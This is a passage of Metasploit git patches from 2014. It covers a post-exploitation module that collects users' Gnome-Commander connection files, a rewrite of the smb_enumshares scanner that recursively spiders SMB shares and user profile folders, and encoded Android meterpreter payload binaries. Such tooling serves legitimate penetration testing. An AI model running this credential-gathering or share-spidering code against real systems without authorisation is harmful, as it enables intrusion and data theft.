         rescue EOFError

From 48982b3b89bab4eb3fa92707116ee7c40982e5ab Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 23:16:45 +0200
Subject: [PATCH 162/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 1bf5687f6c..45dc6abf19 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
         begin
           print_good("File found : #{connections_file}")
           print_line(read_file(connections_file))
-          p = store_loot("connections", "text/plain", session, read_file(connections_file), "connections_file", "Gnome-Commander connections")
+          p = store_loot("connections", "text/plain", session, read_file(connections_file), connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
           print_line()
         rescue EOFError

From 9dc37c3cc71bc5f5273439fbc655832bd190b0a7 Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 23:18:26 +0200
Subject: [PATCH 163/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 45dc6abf19..cab5b0f584 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
   def run
     user_dirs = []
     user = cmd_exec("whoami").chomp
-    if (user == /root/)
+    if (user == 'root')
        print_status("Current user is #{user}, probing all home dirs")
        user_dirs << '/root'
        cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }

From f4440680b6e82bc08780758cf07d68256891a059 Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 23:30:26 +0200
Subject: [PATCH 164/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index cab5b0f584..586fa861f7 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -34,20 +34,21 @@ class Metasploit3 < Msf::Post
     # Try to find connections file in users homes
     user_dirs.each do |dir|
       connections_file = "#{dir}/.gnome-commander/connections"
-      unless file?(connections_file)
-        # File not found
-        print_error("File not found : #{connections_file}")
-      else
+      if file?(connections_file)
         begin
+          str_file=read_file(connections_file)
           print_good("File found : #{connections_file}")
-          print_line(read_file(connections_file))
-          p = store_loot("connections", "text/plain", session, read_file(connections_file), connections_file, "Gnome-Commander connections")
+          vprint_line(str_file)
+          p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
           print_line()
         rescue EOFError
           # If there's nothing in the file, we hit EOFError
           print_error("Nothing read from file: #{connections_file}, file may be empty")
         end
+      else
+        # File not found
+        print_error("File not found : #{connections_file}")
       end
     end
   end

From e35ee1f037afc3eaa58f7d2222ea9c9113048651 Mon Sep 17 00:00:00 2001
From: David Bloom <softage.informatique@gmail.com>
Date: Thu, 24 Jul 2014 23:36:32 +0200
Subject: [PATCH 165/321] Update gnome_commander_creds.rb

---
 modules/post/linux/gather/gnome_commander_creds.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
index 586fa861f7..07ddc0fcad 100644
--- a/modules/post/linux/gather/gnome_commander_creds.rb
+++ b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -41,7 +41,6 @@ class Metasploit3 < Msf::Post
           vprint_line(str_file)
           p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
           print_good ("Connections file saved to #{p}")
-          print_line()
         rescue EOFError
           # If there's nothing in the file, we hit EOFError
           print_error("Nothing read from file: #{connections_file}, file may be empty")
@@ -52,4 +51,5 @@ class Metasploit3 < Msf::Post
       end
     end
   end
+  
 end

From 51c488a5ead4168f06cc132e56b1c49a4a3b8430 Mon Sep 17 00:00:00 2001
From: Alton Johnson <alton.jx@gmail.com>
Date: Thu, 24 Jul 2014 21:11:18 -0500
Subject: [PATCH 166/321] Added smb_enumshares.

---
 .../auxiliary/scanner/smb/smb_enumshares.rb   | 186 +++++++++++++-----
 1 file changed, 141 insertions(+), 45 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index 42d86801f2..8359d7f6a6 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary
           'hdm',
           'nebulus',
           'sinn3r',
+          'altonjx',
           'r3dy'
         ],
       'License'        => MSF_LICENSE,
@@ -44,7 +45,11 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptBool.new('DIR_SHARE',      [true, 'Show all the folders and files', false ]),
+        OptBool.new('SpiderShares',      [false, 'Spider shares recursively', false]),
+        OptBool.new('VERBOSE',        [true, 'Show detailed information when spidering', true]),
+        OptBool.new('SpiderProfiles',  [false, 'Spider only user profiles when share = C$', true]),
+        OptInt.new('LogSpider',      [false, '1 = CSV, 2 = table (txt), 3 = one liner (txt)', 3]),
+        OptInt.new('MaxDepth',      [true, 'Max number of subdirectories to spider', 999]),
         OptBool.new('USE_SRVSVC_ONLY', [true, 'List shares only with SRVSVC', false ])
       ], self.class)
 
@@ -75,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
     t.strftime("%m-%d-%Y %H:%M:%S")
   end
 
-  def eval_host(ip, share)
+  def eval_host(ip, share, subdir="")
     read = write = false
 
     # srvsvc adds a null byte that needs to be removed
@@ -132,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary
 
     return read,write,msg,nil if skip
 
-    rfd = self.simple.client.find_first("\\")
+    rfd = self.simple.client.find_first("#{subdir}\\*")
     read = true if rfd != nil
 
     # Test writable
@@ -276,57 +281,148 @@ class Metasploit3 < Msf::Auxiliary
     shares
   end
 
+  def profile_options(ip, share)
+    usernames = []
+    old_dirs = ['My Documents','Desktop']
+    new_dirs = ['Desktop','Documents','Downloads','Music','Pictures','Videos']
+    subdirs = []
+    begin
+      read,write,type,files = eval_host(ip, share, "Documents and Settings")
+      files.each do |f|
+        if f[0] != "." and f[0] != ".."
+          usernames.push(f[0])
+        end
+      end
+
+      # Return usernames along with their profile directories.
+      usernames.each do |username|
+        old_dirs.each do |dir|
+          subdirs.push("Documents and Settings\\#{username}\\#{dir}")
+        end
+      end
+    rescue
+      read,write,type,files = eval_host(ip, share, "Users")
+      files.each do |f|
+        if f[0] != "." and f[0] != ".."
+          usernames.push(f[0])
+        end
+      end
+
+      # Return usernames along with their profile directories.
+      usernames.each do |username|
+        new_dirs.each do |dir|
+          subdirs.push("Users\\#{username}\\#{dir}")
+        end
+      end
+    end
+    return subdirs
+  end
+
   def get_files_info(ip, rport, shares, info)
+
     read  = false
     write = false
 
+    # Creating a separate file for each IP address's results.
+    detailed_tbl = Rex::Ui::Text::Table.new(
+      'Header'  => "Spidered results for #{ip}.",
+      'Indent'  => 1,
+      'Columns' => [ 'IP Address', 'Type', 'Share', 'Path', 'Name', 'Created', 'Accessed', 'Written', 'Changed', 'Size' ]
+    )
+
+    logdata = ""
+
     list = shares.collect {|e| e[0]}
     list.each do |x|
-      read,write,type,files = eval_host(ip, x)
-      if files and (read or write)
-        header = "#{ip}:#{rport}"
-        if simple.client.default_domain and simple.client.default_name
-          header << " \\\\#{simple.client.default_domain}"
-        end
-        header << "\\#{simple.client.default_name}\\#{x}" if simple.client.default_name
-        header << " (#{type})" if type
-        header << " Readable"  if read
-        header << " Writable"  if write
+      if x.strip == "ADMIN$"
+        next
+      end
+      if not datastore['VERBOSE']
+        print_status("#{ip}:#{rport} - Spidering #{x}.")
+      end
+      subdirs = [""]
+      if x.strip() == "C$" and datastore['SpiderProfiles']
+        subdirs = profile_options(ip, x)
+      end
 
-        tbl = Rex::Ui::Text::Table.new(
-          'Header'  => header,
-          'Indent'  => 1,
-          'Columns' => [ 'Type', 'Name', 'Created', 'Accessed', 'Written', 'Changed', 'Size' ]
-        )
-
-        f_types = {
-          1  => 'RO',  2  => 'HIDDEN', 4  => 'SYS', 8   => 'VOL',
-          16 => 'DIR', 32 => 'ARC',    64 => 'DEV', 128 => 'FILE'
-        }
-
-        files.each do |file|
-          if file[0] and file[0] != '.' and file[0] != '..'
-            info  = file[1]['info']
-            fa    = f_types[file[1]['attr']]       # Item type
-            fname = file[0]                        # Filename
-            tcr   = to_unix_time(info[3], info[2]) # Created
-            tac   = to_unix_time(info[5], info[4]) # Accessed
-            twr   = to_unix_time(info[7], info[6]) # Written
-            tch   = to_unix_time(info[9], info[8]) # Changed
-            sz    = info[12] + info[13]            # Size
-
-            # Filename is too long for the UI table, cut it.
-            fname = "#{fname[0, 35]}..." if fname.length > 35
-
-            tbl << [fa || 'Unknown', fname, tcr, tac, twr, tch, sz]
+      while subdirs.length > 0
+        depth = subdirs[0].count("\\")
+        if datastore['SpiderProfiles'] and x == "C$"
+          if depth-2 > datastore['MaxDepth']
+            subdirs.shift
+            next
+          end
+        else
+          if depth > datastore['MaxDepth']
+            subdirs.shift
+            next
           end
         end
+        read,write,type,files = eval_host(ip, x, subdirs[0])
+        if files and (read or write)
+          if files.length < 3
+            subdirs.shift
+            next
+          end
+          header = "#{ip}:#{rport}"
+          if simple.client.default_domain and simple.client.default_name
+            header << " \\\\#{simple.client.default_domain}"
+          end
+          header << "\\#{x.sub("C$","C$\\")}" if simple.client.default_name
+          header << subdirs[0]
 
-        print_good(tbl.to_s)
-        unless tbl.rows.empty?
-          p = store_loot('smb.shares', 'text/csv', ip, tbl.to_csv)
-          print_good("#{x} info saved in: #{p.to_s}")
+          pretty_tbl = Rex::Ui::Text::Table.new(
+            'Header'  => header,
+            'Indent'  => 1,
+            'Columns' => [ 'Type', 'Name', 'Created', 'Accessed', 'Written', 'Changed', 'Size' ]
+          )
+
+          f_types = {
+            1  => 'RO',  2  => 'HIDDEN', 4  => 'SYS', 8   => 'VOL',
+            16 => 'DIR', 32 => 'ARC',    64 => 'DEV', 128 => 'FILE'
+          }
+
+          files.each do |file|
+            if file[0] and file[0] != '.' and file[0] != '..'
+              info  = file[1]['info']
+              fa    = f_types[file[1]['attr']]       # Item type
+              fname = file[0]                        # Filename
+              tcr   = to_unix_time(info[3], info[2]) # Created
+              tac   = to_unix_time(info[5], info[4]) # Accessed
+              twr   = to_unix_time(info[7], info[6]) # Written
+              tch   = to_unix_time(info[9], info[8]) # Changed
+              sz    = info[12] + info[13]            # Size
+
+              # Filename is too long for the UI table, cut it.
+              fname = "#{fname[0, 35]}..." if fname.length > 35
+
+              # Add subdirectories to list to use if SpiderShare is enabled.
+              if fa == "DIR" or (fa == nil and sz == 0)
+                subdirs.push(subdirs[0] + "\\" + fname)
+              end
+
+              pretty_tbl << [fa || 'Unknown', fname, tcr, tac, twr, tch, sz]
+              detailed_tbl << ["#{ip}", fa || 'Unknown', "#{x}", subdirs[0] + "\\", fname, tcr, tac, twr, tch, sz]
+              logdata << "#{ip}\\#{x.sub("C$","C$\\")}#{subdirs[0]}\\#{fname}\n"
+
+            end
+          end
+          vprint_good(pretty_tbl.to_s)
         end
+        subdirs.shift
+      end
+    print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['VERBOSE'] == true
+    end
+    unless detailed_tbl.rows.empty?
+      if datastore['LogSpider'] == 1
+        p = store_loot('smb.enumshares', 'text/csv', ip, detailed_tbl.to_csv)
+        print_good("#{ip} - info saved in: #{p.to_s}")
+      elsif datastore['LogSpider'] == 2
+        p = store_loot('smb.enumshares', 'text', ip, detailed_tbl)
+        print_good("#{ip} - info saved in: #{p.to_s}")
+      elsif datastore['LogSpider'] == 3
+        p = store_loot('smb.enumshares', 'text', ip, logdata)
+        print_good("#{ip} - info saved in: #{p.to_s}")
       end
     end
   end
@@ -363,7 +459,7 @@ class Metasploit3 < Msf::Auxiliary
         if shares.empty?
           print_status("#{ip}:#{rport} - No shares collected")
         else
-          shares_info = shares.map{|x| "#{ip}:  #{x[0]} - (#{x[1]}) #{x[2]}" }.join(", ")
+          shares_info = shares.map{|x| "#{ip}:#{rport} - #{x[0]} - (#{x[1]}) #{x[2]}" }.join(", ")
           shares_info.split(", ").each { |share|
             print_good share
           }
@@ -376,7 +472,7 @@ class Metasploit3 < Msf::Auxiliary
             :update => :unique_data
           )
 
-          if datastore['DIR_SHARE']
+          if datastore['SpiderShares']
             get_files_info(ip, rport, shares, info)
           end
 

From cdc56df09f65fd07d30a0895fa73c65a1aac9b08 Mon Sep 17 00:00:00 2001
From: Alton Johnson <alton.jx@gmail.com>
Date: Thu, 24 Jul 2014 21:18:02 -0500
Subject: [PATCH 167/321] Updated smb_enumshares.rb

---
 modules/auxiliary/scanner/smb/smb_enumshares.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index 8359d7f6a6..d119ac0de5 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -33,8 +33,8 @@ class Metasploit3 < Msf::Auxiliary
           'hdm',
           'nebulus',
           'sinn3r',
-          'altonjx',
-          'r3dy'
+          'r3dy',
+          'altonjx'
         ],
       'License'        => MSF_LICENSE,
       'DefaultOptions' =>

From d0cd5cfc7a118640662f639a9f061a001d1369f5 Mon Sep 17 00:00:00 2001
From: Alton Johnson <alton.jx@gmail.com>
Date: Thu, 24 Jul 2014 21:53:23 -0500
Subject: [PATCH 168/321] Updated.

---
 modules/auxiliary/scanner/smb/smb_enumshares.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index d119ac0de5..71cbca9132 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -370,6 +370,9 @@ class Metasploit3 < Msf::Auxiliary
           end
           header << "\\#{x.sub("C$","C$\\")}" if simple.client.default_name
           header << subdirs[0]
+          header << " (#{type})" if type
+          header << " - Readable" if read
+          header << " - Writable" if write
 
           pretty_tbl = Rex::Ui::Text::Table.new(
             'Header'  => header,

From 58502f139af8d1fa54e917b29fd46f295ddc3635 Mon Sep 17 00:00:00 2001
From: Alton Johnson <alton.jx@gmail.com>
Date: Fri, 25 Jul 2014 15:46:50 -0500
Subject: [PATCH 169/321] Updated.

---
 modules/auxiliary/scanner/smb/smb_enumshares.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index 71cbca9132..7d77ec0f04 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
         OptBool.new('SpiderShares',      [false, 'Spider shares recursively', false]),
         OptBool.new('VERBOSE',        [true, 'Show detailed information when spidering', true]),
         OptBool.new('SpiderProfiles',  [false, 'Spider only user profiles when share = C$', true]),
-        OptInt.new('LogSpider',      [false, '1 = CSV, 2 = table (txt), 3 = one liner (txt)', 3]),
+        OptEnum.new('LogSpider',      [false, '0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt)', 3, [0,1,2,3]]),
         OptInt.new('MaxDepth',      [true, 'Max number of subdirectories to spider', 999]),
         OptBool.new('USE_SRVSVC_ONLY', [true, 'List shares only with SRVSVC', false ])
       ], self.class)
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
     t.strftime("%m-%d-%Y %H:%M:%S")
   end
 
-  def eval_host(ip, share, subdir="")
+  def eval_host(ip, share, subdir = "")
     read = write = false
 
     # srvsvc adds a null byte that needs to be removed
@@ -417,13 +417,13 @@ class Metasploit3 < Msf::Auxiliary
     print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['VERBOSE'] == true
     end
     unless detailed_tbl.rows.empty?
-      if datastore['LogSpider'] == 1
+      if datastore['LogSpider'] == '1'
         p = store_loot('smb.enumshares', 'text/csv', ip, detailed_tbl.to_csv)
         print_good("#{ip} - info saved in: #{p.to_s}")
-      elsif datastore['LogSpider'] == 2
+      elsif datastore['LogSpider'] == '2'
         p = store_loot('smb.enumshares', 'text', ip, detailed_tbl)
         print_good("#{ip} - info saved in: #{p.to_s}")
-      elsif datastore['LogSpider'] == 3
+      elsif datastore['LogSpider'] == '3'
         p = store_loot('smb.enumshares', 'text', ip, logdata)
         print_good("#{ip} - info saved in: #{p.to_s}")
       end

From 555e6c9cff6f7229aeb39218a2b8efc396de5b2e Mon Sep 17 00:00:00 2001
From: Alton Johnson <alton.jx@gmail.com>
Date: Fri, 25 Jul 2014 18:23:12 -0500
Subject: [PATCH 170/321] Modified a few things based on suggestions.

---
 .../auxiliary/scanner/smb/smb_enumshares.rb   | 65 +++++++++----------
 1 file changed, 29 insertions(+), 36 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb
index 7d77ec0f04..af4d1ab916 100644
--- a/modules/auxiliary/scanner/smb/smb_enumshares.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb
@@ -281,45 +281,41 @@ class Metasploit3 < Msf::Auxiliary
     shares
   end
 
-  def profile_options(ip, share)
+  def get_user_dirs(ip, share, base, sub_dirs)
+    dirs = []
     usernames = []
+
+    begin
+      read,write,type,files = eval_host(ip, share, base)
+      files.each do |f|
+        if f[0] != "." and f[0] != ".."
+          usernames.push(f[0])
+        end
+      end
+      usernames.each do |username|
+        sub_dirs.each do |sub_dir|
+          dirs.push("#{base}\\#{username}\\#{sub_dir}")
+        end
+      end
+      return dirs
+    rescue
+      dirs = nil
+      return dirs
+    end
+  end
+
+  def profile_options(ip, share)
     old_dirs = ['My Documents','Desktop']
     new_dirs = ['Desktop','Documents','Downloads','Music','Pictures','Videos']
-    subdirs = []
-    begin
-      read,write,type,files = eval_host(ip, share, "Documents and Settings")
-      files.each do |f|
-        if f[0] != "." and f[0] != ".."
-          usernames.push(f[0])
-        end
-      end
 
-      # Return usernames along with their profile directories.
-      usernames.each do |username|
-        old_dirs.each do |dir|
-          subdirs.push("Documents and Settings\\#{username}\\#{dir}")
-        end
-      end
-    rescue
-      read,write,type,files = eval_host(ip, share, "Users")
-      files.each do |f|
-        if f[0] != "." and f[0] != ".."
-          usernames.push(f[0])
-        end
-      end
-
-      # Return usernames along with their profile directories.
-      usernames.each do |username|
-        new_dirs.each do |dir|
-          subdirs.push("Users\\#{username}\\#{dir}")
-        end
-      end
+    dirs = get_user_dirs(ip, share, "Documents and Settings", old_dirs)
+    if dirs == nil
+      dirs = get_user_dirs(ip, share, "Users", new_dirs)
     end
-    return subdirs
+    return dirs
   end
 
   def get_files_info(ip, rport, shares, info)
-
     read  = false
     write = false
 
@@ -334,7 +330,8 @@ class Metasploit3 < Msf::Auxiliary
 
     list = shares.collect {|e| e[0]}
     list.each do |x|
-      if x.strip == "ADMIN$"
+      x = x.strip
+      if x == "ADMIN$" or x == "IPC$"
         next
       end
       if not datastore['VERBOSE']
@@ -344,7 +341,6 @@ class Metasploit3 < Msf::Auxiliary
       if x.strip() == "C$" and datastore['SpiderProfiles']
         subdirs = profile_options(ip, x)
       end
-
       while subdirs.length > 0
         depth = subdirs[0].count("\\")
         if datastore['SpiderProfiles'] and x == "C$"
@@ -370,9 +366,6 @@ class Metasploit3 < Msf::Auxiliary
           end
           header << "\\#{x.sub("C$","C$\\")}" if simple.client.default_name
           header << subdirs[0]
-          header << " (#{type})" if type
-          header << " - Readable" if read
-          header << " - Writable" if write
 
           pretty_tbl = Rex::Ui::Text::Table.new(
             'Header'  => header,

From ae1f498aaedfb8bd3bc1f6600abff1cefbac1c77 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Sun, 27 Jul 2014 13:22:12 -0700
Subject: [PATCH 171/321] Check in new android binaries.

---
 data/android/apk/classes.dex    | Bin 17524 -> 10020 bytes
 data/android/apk/resources.arsc | Bin 584 -> 580 bytes
 data/android/meterpreter.jar    | Bin 41992 -> 41691 bytes
 data/android/metstage.jar       | Bin 1851 -> 1851 bytes
 data/android/shell.jar          | Bin 1853 -> 1853 bytes
 5 files changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex
index 2868666445d29452ccc713a4bd344d9f281bf066..7645402831c3882fe19b5b5a1b4bc3f1d9195b23 100644
GIT binary patch
literal 10020
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
